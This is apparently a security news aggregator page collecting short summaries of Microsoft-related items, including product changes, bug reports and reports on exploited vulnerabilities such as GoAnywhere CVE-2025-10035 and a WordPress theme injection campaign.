All news with #microsoft tag

Microsoft Enables Default Auto-Archiving in Exchange Online

📥 Microsoft is enabling threshold-based auto-archiving by default for Exchange Online, moving the oldest items to users' archive mailboxes when primary mailbox usage approaches 90%, provided an archive is provisioned and has available space. The Managed Folder Assistant will continuously monitor mailbox sizes and archive until usage drops below the threshold. Rollout begins this month for public clouds and is scheduled for government clouds in November; users can tag items with the Never Move to Archive flag to prevent them from being archived. The change complements recent Defender for Office 365 updates that detect email bombing attacks.

Hackers Inject Redirecting JavaScript via WordPress Themes

🔒 Security researchers warn of an active campaign that modifies WordPress theme files (notably functions.php) to inject malicious JavaScript that redirects visitors to fraudulent verification and malware distribution pages. The injected loader uses obfuscated references to advertising services but posts to a controller domain that serves a remote script from porsasystem[.]com and an iframe mimicking Cloudflare assets. The activity has ties to the Kongtuke traffic distribution system and highlights the need to patch themes, enforce strong credentials, and scan for persistent backdoors.

Disrupting Threats Targeting Microsoft Teams Environments

🛡️ Microsoft Threat Intelligence details how adversaries exploit Microsoft Teams collaboration capabilities—chat, calls, meetings, and screen sharing—at multiple stages of the attack chain. The post chronicles 2024–2025 campaigns and toolsets (phishing, malvertising, deepfakes, device code phishing, and red‑team tool reuse) that enable initial access, persistence, and exfiltration. It emphasizes layered defenses across identity, endpoints, apps, data, and network controls, and provides detection guidance, hunting queries, and product-specific recommendations to help defenders disrupt these operations.

Microsoft SFI Patterns and Practices: New Security Guides

🔐 Microsoft published a second installment of the Secure Future Initiative (SFI) patterns and practices, delivering six practical, practitioner-built guides that address network isolation, tenant hardening, Entra ID app security, Zero Trust for source code access, software supply chain protection, and centralized log collection. Each article outlines the problem, Microsoft’s internal solution, actionable customer guidance, and trade-offs to help teams apply scalable controls across complex, multi-cloud environments.

Microsoft Blocks More Ways to Bypass Windows 11 MSA

🔒 Microsoft is removing further methods that allow creating local accounts and bypassing the Microsoft account requirement during Windows 11 setup. The change appears in Windows 11 Insider Preview Build 26220.6772 (KB5065797) on the Dev Channel and is expected to reach production releases. Microsoft said it will remove known mechanisms in the OOBE experience because they can skip critical setup screens and leave a device not fully configured. Going forward, OOBE will require internet access and a Microsoft account to complete setup.

Microsoft Links Storm-1175 to GoAnywhere Flaw, Medusa

🔒 Microsoft attributed active exploitation of a critical Fortra GoAnywhere vulnerability (CVE-2025-10035, CVSS 10.0) to the cybercriminal group Storm-1175, which has been observed deploying Medusa ransomware. The flaw is a deserialization bug that can permit unauthenticated command injection when a forged license response signature is accepted. Fortra released fixes in GoAnywhere 7.8.4 and Sustain Release 7.6.3; organizations should apply updates immediately and hunt for indicators such as dropped RMM tools, .jsp web shells, Cloudflare tunnels and Rclone usage.

Inside Microsoft Threat Intelligence: Calm in Chaos

🔎 Microsoft’s Incident Response (IR) team emphasizes calm, clarity, and rapid action when customers encounter major breaches. Adrian Hill explains how IR establishes trust within the first 30 seconds and coordinates with other vendors and stakeholders to stabilize compromised environments. Field discoveries are fed back into Microsoft Threat Intelligence, enabling new detections and product protections. Follow-up recovery, containment, and strategic guidance turn response into lasting partnership.

Critical GoAnywhere MFT Flaw Exploited in Medusa Attacks

⚠️ Microsoft warns that a critical deserialization vulnerability in GoAnywhere MFT (CVE-2025-10035) has been actively exploited by a Medusa ransomware affiliate tracked as Storm-1175 since early September. The License Servlet flaw enables remote compromise without user interaction, allowing attackers to gain initial access and persist via abused RMM tools. Administrators should apply Fortra's patches and inspect logs for SignedObject.getObject stack traces.

Microsoft bug: Multiple Office apps break Copilot pane

🔧 Microsoft is investigating a bug that prevents the Copilot pane and other WebView2-dependent features from launching when multiple Office applications (Excel, Word, PowerPoint, OneNote, Publisher, Access) run concurrently. The issue occurs when one app initializes a WebView2 instance and a second app attempts to start another; closing the first app allows the pane to open normally. The Office team is working on a resolution and will provide updates when available.

Active Exploitation of GoAnywhere CVE-2025-10035 Observed

🔒 Microsoft Threat Intelligence warns of active exploitation of a critical deserialization vulnerability in GoAnywhere MFT License Servlet (CVE-2025-10035, CVSS 10.0) that can allow forged license responses to trigger arbitrary object deserialization and potential remote code execution. Activity attributed to Storm-1175 included initial access via this flaw, deployment of RMM tools (SimpleHelp, MeshAgent), and at least one Medusa ransomware incident. Customers should upgrade per Fortra guidance, run EDR in block mode, restrict outbound connections, and use the provided Defender detections and IoCs for hunting and response.

Steam, Microsoft Warn of Unity Flaw Exposing Gamers

⚠️ A code execution vulnerability in Unity's Runtime (CVE-2025-59489) can allow unsafe file loading and local file inclusion, enabling code execution on Android and privilege escalation on Windows. Valve/Steam issued a Client update to block launching custom URI schemes and urges publishers to rebuild with a safe Unity version or replace the UnityPlayer.dll. Microsoft published guidance recommending users uninstall vulnerable games until patched, and Unity advises developers to update the Editor, recompile, and redeploy.

CISA Adds Seven CVEs to Known Exploited Vulnerabilities

🔒 CISA has added seven vulnerabilities to its Known Exploited Vulnerabilities (KEV) Catalog after observing evidence of active exploitation. The newly listed entries include CVE-2010-3765, CVE-2010-3962, CVE-2011-3402, CVE-2013-3918, CVE-2021-22555, CVE-2021-43226, and CVE-2025-61882, impacting Mozilla, Microsoft, the Linux Kernel, and Oracle E-Business Suite. Federal Civilian Executive Branch agencies must remediate these vulnerabilities under BOD 22-01, and CISA strongly urges all organizations to prioritize timely remediation as part of routine vulnerability management.

Microsoft Outlook stops displaying inline SVG images

🔒 Microsoft will no longer display inline SVG images in Outlook for Web and the new Outlook for Windows; users will instead see blank spaces where those images would have appeared. The global rollout began in early September 2025 and is expected to complete by mid‑October 2025, with Microsoft estimating the change will affect less than 0.1% of images. SVG files sent as classic attachments will continue to be viewable from the attachment well to limit user disruption.

Microsoft Named a Leader in IDC MarketScape for XDR

🔒 Microsoft has been named a Leader in the IDC MarketScape: Worldwide Extended Detection and Response Software 2025 assessment. Microsoft Defender XDR is highlighted for broad signal coverage across endpoints, identities, email and collaboration, SaaS apps, cloud workloads, and data, plus AI-driven automation and native SIEM integration that consolidate visibility and accelerate response. IDC also cited Microsoft Security Copilot and automatic attack disruption as key differentiators that reduce dwell time and free SOC teams to focus on higher-value tasks.

Microsoft Defender Bug Triggers False BIOS Update Alerts

⚠️ Microsoft is addressing a logic bug in Microsoft Defender for Endpoint that causes some Dell devices' BIOS firmware to be incorrectly marked as outdated, prompting unnecessary update alerts to users. The company says a fix has been developed and is being prepared for deployment, but it has not disclosed the regions or number of customers affected. Microsoft also recently resolved macOS black screen crashes linked to a deadlock in the Apple enterprise security framework and has been correcting several anti-spam and machine-learning false positives impacting Teams and Exchange Online.

ThreatsDay Bulletin: Exploits Target Cars, Cloud, Browsers

🔔 From unpatched vehicles to hijacked clouds, this ThreatsDay bulletin outlines active threats and defensive moves across endpoints, cloud, browsers, and vehicles. Observers reported internet-wide scans exploiting PAN-OS GlobalProtect (CVE-2024-3400) and campaigns that use weak MS‑SQL credentials to deploy XiebroC2 for persistent access. New AirBorne CarPlay/iAP2 flaws can chain to take over Apple CarPlay in some cases without user interaction, while attackers quietly poison browser preferences to sideload malicious extensions. On defence, Google announced AI-driven ransomware detection for Drive and Microsoft plans an Edge revocation feature to curb sideloaded threats.

Microsoft: Classic Outlook Crash Requires Support Ticket

🔧 Microsoft is investigating a known issue that causes classic Outlook on Windows to crash at launch for some Microsoft 365 customers. The vendor has not provided a public fix; affected customers must open a support case in the Microsoft 365 Admin portal so Exchange Online support can request a service change. Microsoft notes the error can stem from different causes but recent cases have involved user mailboxes, and it recommends capturing a Fiddler trace for triage. Temporary workarounds include using new Outlook for Windows or Outlook Web Access until mitigation is applied.

Microsoft to Force-Install Microsoft 365 Companion Apps

📌 Microsoft will automatically install the Microsoft 365 companion apps on Windows 11 devices that have the Microsoft 365 desktop apps, beginning in late October 2025 and completing by the end of December 2025. The suite — People, Files, and Calendar — integrates Copilot for contextual AI assistance from the taskbar. IT admins can opt out via the Microsoft 365 Apps admin center or disable app auto‑launch in each app's Settings.

Microsoft Advances Sentinel with Agentic AI Upgrades

🔒 Microsoft announced major AI upgrades for Sentinel SIEM and Security Copilot, positioning them as agentic platforms. The update makes Sentinel data lake generally available and introduces public-preview releases of Sentinel graph and the Sentinel Model Context Protocol (MCP) Server so AI agents can access and act on SIEM data. Customers can now build custom agents with natural‑language prompts and discover third‑party agents via a revamped store. Microsoft positions agents to automate investigation and response but warns of increased noise, false positives and a new attack surface.

Cybersecurity Awareness Month: Security Starts With You

🔐 As Cybersecurity Awareness Month begins, Microsoft emphasizes that cybersecurity is both a personal and organizational responsibility. The post spotlights the Microsoft Secure Future Initiative (SFI), which has mobilized more than 34,000 engineers to reduce risk and implement protections such as phishing-resistant multifactor authentication on 100% of production system accounts and 92% of employee productivity accounts. It highlights new resources — including the Be Cybersmart Kit and SFI patterns and practices — plus learning paths, scholarships, and programs to help organizations and students improve security skills.